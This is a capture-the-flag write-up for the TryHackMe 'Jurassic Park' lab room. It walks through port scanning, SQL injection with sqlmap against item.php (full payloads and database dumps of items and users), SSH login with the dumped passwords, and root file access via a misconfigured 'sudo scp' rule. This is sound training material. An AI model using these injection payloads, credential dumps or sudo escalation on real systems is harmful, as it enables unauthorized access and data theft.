TryHackMe: Jurassic Park CTF
TryHackMe: Jurassic Park by tryhackme
Introduction
This medium-hard task will require you to enumerate the web application, get credentials to the server and find 5 flags hidden around the file system. Oh, Dennis Nedry has helped us to secure the app too...
You're also going to want to turn up your devices volume (firefox is recommended). So, deploy the VM and get hacking..
Please connect to our network before deploying the machine.
Enumeration
Let's add to /etc/hosts
and run our rustscan
╰─⠠⠵ rustscan -a jurassicpark --ulimit 10000 -- -sC -sV -oA jurassicpark -A
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: https://discord.gg/GFrQsGy :
: https://github.com/RustScan/RustScan :
--------------------------------------
Nmap? More like slowmap.🐢
[~] The config file is expected to be at "/home/tony/.rustscan.toml"
[~] Automatically increasing ulimit value to 10000.
Open 10.10.128.117:22
Open 10.10.128.117:80
[~] Starting Script(s)
[>] Script to be run Some("nmap -vvv -p {{port}} {{ip}}")
[~] Starting Nmap 7.80 ( https://nmap.org ) at 2021-04-05 14:23 BST
NSE: Loaded 151 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 14:23
Completed NSE at 14:23, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 14:23
Completed NSE at 14:23, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 14:23
Completed NSE at 14:23, 0.00s elapsed
Initiating Ping Scan at 14:23
Scanning 10.10.128.117 [2 ports]
Completed Ping Scan at 14:23, 0.03s elapsed (1 total hosts)
Initiating Connect Scan at 14:23
Scanning jurassicpark (10.10.128.117) [2 ports]
Discovered open port 22/tcp on 10.10.128.117
Discovered open port 80/tcp on 10.10.128.117
Completed Connect Scan at 14:23, 0.03s elapsed (2 total ports)
Initiating Service scan at 14:23
Scanning 2 services on jurassicpark (10.10.128.117)
Completed Service scan at 14:23, 6.08s elapsed (2 services on 1 host)
NSE: Script scanning 10.10.128.117.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 14:23
Completed NSE at 14:23, 1.25s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 14:23
Completed NSE at 14:23, 0.13s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 14:23
Completed NSE at 14:23, 0.00s elapsed
Nmap scan report for jurassicpark (10.10.128.117)
Host is up, received syn-ack (0.031s latency).
Scanned at 2021-04-05 14:23:48 BST for 8s
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack OpenSSH 7.2p2 Ubuntu 4ubuntu2.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 a6:28:1c:ac:b5:8b:b7:92:1e:55:55:05:b3:36:2d:7f (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCwYoZ4gqy9T1lTU8706cjCZIC7zphOKGnmtwCXX4eVeBgrah3FA7R5BJMAAXfN7de4DGsz07Etl/zq7M2a/hpuyn8aKfqOV/p+u7WzEDRT1OGIu1QQ3EUkBV1WRxUERYZI2NwYf6RElAOX3oC4cxti6T+M2/h4iMrWF7bmiDsRIjDYimBJxa7w1BY+pRtQbF73YQw26H01yWdqUTj4Rsk8jl0Agmqu0bHSFiY8rQAH9oNQiZZELjfcaqMQhBn58dRELovcP68IOXKYhFyFmhbf+4gm3ArfLD/7dnHdUl5KkW3sQ2Hwqb+iVZzuA+VBelrBkf8VDdVj5dyEjuwegxSR
| 256 0d:aa:49:6a:74:41:b2:52:cb:11:52:a3:50:db:f1:67 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBGdtKIl/IVtUx1Z1bddIlwz5HG2XjXcUxZFLULXqkJIjvRn9pMCp3nHzZAwL1dxqDhOupMacnSyKcvjzIAU0aY0=
| 256 b8:28:2e:de:d0:51:35:12:df:8c:c1:77:13:65:5c:9a (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIO55AArg7Xen1m0AeoYRClqkyUqJovHesgPQDYbdzZvr
80/tcp open http syn-ack Apache httpd 2.4.18 ((Ubuntu))
|_http-favicon: Unknown favicon MD5: 019A6B943FC3AAA6D09FBA3C139A909A
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Jarassic Park
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 14:23
Completed NSE at 14:23, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 14:23
Completed NSE at 14:23, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 14:23
Completed NSE at 14:23, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.11 seconds
22/ssh
No credentials yet so let's move on......
80/http
robots.txt: Wubbalubbadubdub
There is hidden video in the source code...
<!-- <video src="assets/theme.mp3" autoplay> -->
Over at #/shop.php
we get
What is the SQL database called which is serving the shop information?
From the /shop.php
page open developer tools and then click a Buy...
link. Once on the new page right click the request > copy > copy request headers
Paste this into a new file and use the -r
argument with sqlmap
GET /item.php?id=3 HTTP/1.1
Host: jurassicpark.local
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:87.0) Gecko/20100101 Firefox/87.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://jurassicpark.local/shop.php
Upgrade-Insecure-Requests: 1
DNT: 1
Sec-GPC: 1
Now let's run our sqlmap
command to deump everything
─⠠⠵ sqlmap -r shop.request -dbms=mysql --dbs
___
__H__
___ ___[,]_____ ___ ___ {1.4.4#stable}
|_ -| . ["] | .'| . |
|___|_ ["]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 14:37:32 /2021-04-05/
[14:37:32] [INFO] parsing HTTP request from 'shop.request'
[14:37:32] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=3 AND 3636=3636
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=3 AND (SELECT 7077 FROM(SELECT COUNT(*),CONCAT(0x71787a7671,(SELECT (ELT(7077=7077,1))),0x7178787171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=3 AND (SELECT 1675 FROM (SELECT(SLEEP(5)))NQom)
---
[14:37:32] [INFO] testing MySQL
[14:37:32] [INFO] confirming MySQL
[14:37:32] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.0
[14:37:32] [INFO] fetching database names
[14:37:32] [INFO] resumed: 'information_schema'
[14:37:32] [INFO] resumed: 'mysql'
[14:37:32] [INFO] resumed: '[REDACTED]'
[14:37:32] [INFO] resumed: 'performance_schema'
[14:37:32] [INFO] resumed: 'sys'
available databases [5]:
[*] information_schema
[*] mysql
[*] park
[*] performance_schema
[*] sys
[14:37:32] [INFO] fetched data logged to text files under '/home/tony/.sqlmap/output/jurassicpark.local'
[14:37:32] [WARNING] you haven't updated sqlmap for more than 367 days!!!
[*] ending @ 14:37:32 /2021-04-05/
ANswer: [REDACTED]
How many columns does the table have?
Let's run our sqlmap
command
╰─⠠⠵ sqlmap -r shop.request -dbms=mysql --tables -D park
___
__H__
___ ___[']_____ ___ ___ {1.4.4#stable}
|_ -| . [.] | .'| . |
|___|_ [']_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 14:41:52 /2021-04-05/
[14:41:52] [INFO] parsing HTTP request from 'shop.request'
[14:41:52] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=3 AND 3636=3636
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=3 AND (SELECT 7077 FROM(SELECT COUNT(*),CONCAT(0x71787a7671,(SELECT (ELT(7077=7077,1))),0x7178787171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=3 AND (SELECT 1675 FROM (SELECT(SLEEP(5)))NQom)
---
[14:41:52] [INFO] testing MySQL
[14:41:52] [INFO] confirming MySQL
[14:41:52] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.0
[14:41:52] [INFO] fetching tables for database: 'park'
[14:41:52] [INFO] retrieved: 'items'
[14:41:52] [INFO] retrieved: 'users'
Database: park
[2 tables]
+-------+
| items |
| users |
+-------+
[14:41:52] [INFO] fetched data logged to text files under '/home/tony/.sqlmap/output/jurassicpark.local'
[14:41:52] [WARNING] you haven't updated sqlmap for more than 367 days!!!
[*] ending @ 14:41:52 /2021-04-05/
Ok so we can assume that items
is serving the shop so let's dump this table.
╰─⠠⠵ sqlmap -r shop.request -dbms=mysql -D park -T items --dump
___
__H__
___ ___[']_____ ___ ___ {1.4.4#stable}
|_ -| . [,] | .'| . |
|___|_ ["]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 14:43:03 /2021-04-05/
[14:43:03] [INFO] parsing HTTP request from 'shop.request'
[14:43:04] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=3 AND 3636=3636
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=3 AND (SELECT 7077 FROM(SELECT COUNT(*),CONCAT(0x71787a7671,(SELECT (ELT(7077=7077,1))),0x7178787171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=3 AND (SELECT 1675 FROM (SELECT(SLEEP(5)))NQom)
---
[14:43:04] [INFO] testing MySQL
[14:43:04] [INFO] confirming MySQL
[14:43:04] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.0
[14:43:04] [INFO] fetching columns for table 'items' in database 'park'
[14:43:04] [INFO] retrieved: 'id'
[14:43:04] [INFO] retrieved: 'int(11) unsigned'
[14:43:04] [INFO] retrieved: 'package'
[14:43:04] [INFO] retrieved: 'varchar(11)'
[14:43:04] [INFO] retrieved: 'price'
[14:43:04] [INFO] retrieved: 'int(11)'
[14:43:04] [INFO] retrieved: 'information'
[14:43:04] [INFO] retrieved: 'char(250)'
[14:43:04] [INFO] retrieved: 'sold'
[14:43:04] [INFO] retrieved: 'int(11)'
[14:43:04] [INFO] fetching entries for table 'items' in database 'park'
[14:43:04] [INFO] retrieved: '1'
[14:43:05] [INFO] retrieved: 'Childen under 5 can attend free of charge and will be eaten for free. This package includes a dinosaur lunch, tour around the park AND a F...
[14:43:05] [INFO] retrieved: 'Gold'
[14:43:05] [INFO] retrieved: '500000'
[14:43:05] [INFO] retrieved: '4'
[14:43:05] [INFO] retrieved: '2'
[14:43:05] [INFO] retrieved: 'Children under 5 can attend free of charge and eat free. This package includes a tour around the park and a dinosaur lunch! Try different ...
[14:43:05] [INFO] retrieved: 'Bronse'
[14:43:05] [INFO] retrieved: '250000'
[14:43:05] [INFO] retrieved: '11'
[14:43:05] [INFO] retrieved: '3'
[14:43:05] [INFO] retrieved: 'Children under 5 can attend for free and eat free. This package will include a basic tour around the park in the brand new automated cars!'
[14:43:05] [INFO] retrieved: 'Basic'
[14:43:05] [INFO] retrieved: '100000'
[14:43:05] [INFO] retrieved: '27'
[14:43:05] [INFO] retrieved: '5'
[14:43:06] [INFO] retrieved: 'Dennis, why have you blocked these characters: ' # DROP - username @ ---- Is this our WAF now?'
[14:43:06] [INFO] retrieved: 'Development'
[14:43:06] [INFO] retrieved: '0'
[14:43:06] [INFO] retrieved: '0'
[14:43:06] [INFO] retrieved: '100'
[14:43:06] [INFO] retrieved: 'Nope'
[14:43:06] [INFO] retrieved: '...'
[14:43:06] [INFO] retrieved: '-1'
[14:43:06] [INFO] retrieved: '-1'
Database: park
Table: items
[5 entries]
+------+------+--------+-------------+----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
| id | sold | price | package | information |
+------+------+--------+-------------+----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
| 1 | 4 | 500000 | Gold | Childen under 5 can attend free of charge and will be eaten for free. This package includes a dinosaur lunch, tour around the park AND a FREE dinosaur egg from a dino of your choice! |
| 2 | 11 | 250000 | Bronse | Children under 5 can attend free of charge and eat free. This package includes a tour around the park and a dinosaur lunch! Try different dino's and rate the best tasting one! |
| 3 | 27 | 100000 | Basic | Children under 5 can attend for free and eat free. This package will include a basic tour around the park in the brand new automated cars! |
| 5 | 0 | 0 | Development | Dennis, why have you blocked these characters: ' # DROP - username @ ---- Is this our WAF now? |
| 100 | -1 | -1 | ... | Nope |
+------+------+--------+-------------+----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
[14:43:06] [INFO] table 'park.items' dumped to CSV file '/home/tony/.sqlmap/output/jurassicpark.local/dump/park/items.csv'
[14:43:06] [INFO] fetched data logged to text files under '/home/tony/.sqlmap/output/jurassicpark.local'
[14:43:06] [WARNING] you haven't updated sqlmap for more than 367 days!!!
[*] ending @ 14:43:06 /2021-04-05/
Answers: [REDACTED]
Whats the system version?
I skipped to the next question which resulted in getting ssh
access and then came back to this.
Answer: [REDACTED]
What is dennis' password?
Let's take a look at park.users
╰─⠠⠵ sqlmap -r shop.request -dbms=mysql -D park -T users --dump
___
__H__
___ ___["]_____ ___ ___ {1.4.4#stable}
|_ -| . [.] | .'| . |
|___|_ ["]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 14:49:44 /2021-04-05/
[14:49:44] [INFO] parsing HTTP request from 'shop.request'
[14:49:44] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=3 AND 3636=3636
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=3 AND (SELECT 7077 FROM(SELECT COUNT(*),CONCAT(0x71787a7671,(SELECT (ELT(7077=7077,1))),0x7178787171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=3 AND (SELECT 1675 FROM (SELECT(SLEEP(5)))NQom)
---
[14:49:44] [INFO] testing MySQL
[14:49:44] [INFO] confirming MySQL
[14:49:44] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.0
[14:49:44] [INFO] fetching columns for table 'users' in database 'park'
[14:49:45] [INFO] retrieved: 'id'
[14:49:45] [INFO] retrieved: 'int(11) unsigned'
[14:49:45] [INFO] retrieved: 'username'
[14:49:45] [INFO] retrieved: 'varchar(11)'
[14:49:45] [INFO] retrieved: 'password'
[14:49:45] [INFO] retrieved: 'varchar(11)'
[14:49:45] [INFO] fetching entries for table 'users' in database 'park'
[14:49:45] [INFO] retrieved: '1'
[14:49:45] [INFO] retrieved: '[REDACTED]'
[14:49:45] [INFO] retrieved: '2'
[14:49:45] [INFO] retrieved: '[REDACTED]'
Database: park
Table: users
[2 entries]
+------+----------+------------+
| id | username | password |
+------+----------+------------+
| 1 | | [REDACTED] |
| 2 | | [REDACTED] |
+------+----------+------------+
[14:49:45] [INFO] table 'park.users' dumped to CSV file '/home/tony/.sqlmap/output/jurassicpark.local/dump/park/users.csv'
[14:49:45] [INFO] fetched data logged to text files under '/home/tony/.sqlmap/output/jurassicpark.local'
[14:49:45] [WARNING] you haven't updated sqlmap for more than 367 days!!!
[*] ending @ 14:49:45 /2021-04-05/
Ok, no usernames but we can try both. So let's try these to ssh
to the box.
╰─⠠⠵ ssh dennis@jurassicpark
The authenticity of host 'jurassicpark (10.10.128.117)' can't be established.
ECDSA key fingerprint is SHA256:1kcGE0z+I1Iwi9UZjw+23jHpLB7YypMyMu3UbxVbXRw.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'jurassicpark,10.10.128.117' (ECDSA) to the list of known hosts.
dennis@jurassicpark's password:
Welcome to Ubuntu 16.04.5 LTS (GNU/Linux 4.4.0-1072-aws x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
Get cloud support with Ubuntu Advantage Cloud Guest:
http://www.ubuntu.com/business/services/cloud
62 packages can be updated.
45 updates are security updates.
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
dennis@ip-10-10-128-117:~$
Answer: [REDACTED]
Locate and get the first flag contents.
Let's see what is in Dennis' home directory
dennis@ip-10-10-128-117:~$ ls
flag1.txt test.sh
dennis@ip-10-10-128-117:~$ cat flag1.txt
Congrats on finding the first flag.. But what about the rest? :O
[REDACTED]
Answer: [REDACTED]
Whats the contents of the second flag?
Let's try find
to see if we can locate any other flags
dennis@ip-10-10-128-117:~$ find / -iname "flag*.txt" 2>/dev/null
/home/dennis/flag1.txt
/boot/grub/fonts/flagTwo.txt
dennis@ip-10-10-128-117:~$ cat /boot/grub/fonts/flagTwo.txt
[REDACTED]
Answer: [REDACTED]
Whats the contents of the third flag?
This one took me the longest to find as usually ~/.bash_histroy
is linked to /dev/null
on most machines and so am in the habit of not checking it.
dennis@ip-10-10-128-117:~$ head .bash_history
Flag3:[REDACTED]
sudo -l
sudo scp
scp
sudo find
ls
vim test.sh
ls
cd ~
ls
Answer: [REDACTED]
There is no fourth flag.
Ok, just click completed
Whats the contents of the fifth flag?
Question Hint
Enumerate your privileges.
Ok looking at sudo -l
dennis@ip-10-10-128-117:~$ sudo -l
Matching Defaults entries for dennis on ip-10-10-128-117.eu-west-1.compute.internal:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User dennis may run the following commands on ip-10-10-128-117.eu-west-1.compute.internal:
(ALL) NOPASSWD: /usr/bin/scp
Looking at test.sh
dennis@ip-10-10-128-117:~$ cat test.sh
#!/bin/bash
cat /root/flag5.txt
We we can use scp
to get the root flag.
dennis@ip-10-10-128-117:~$ sudo /usr/bin/scp /root/flag5.txt .
dennis@ip-10-10-128-117:~$ ls
bash flag1.txt flag5.txt test.sh
dennis@ip-10-10-128-117:~$ cat flag5.txt
[REDACTED]
Answer: [REDACTED]
Done
A nice little sql and enumeration room. The rating for this room is hard
but INHO I do not think it, I think this is an easy room.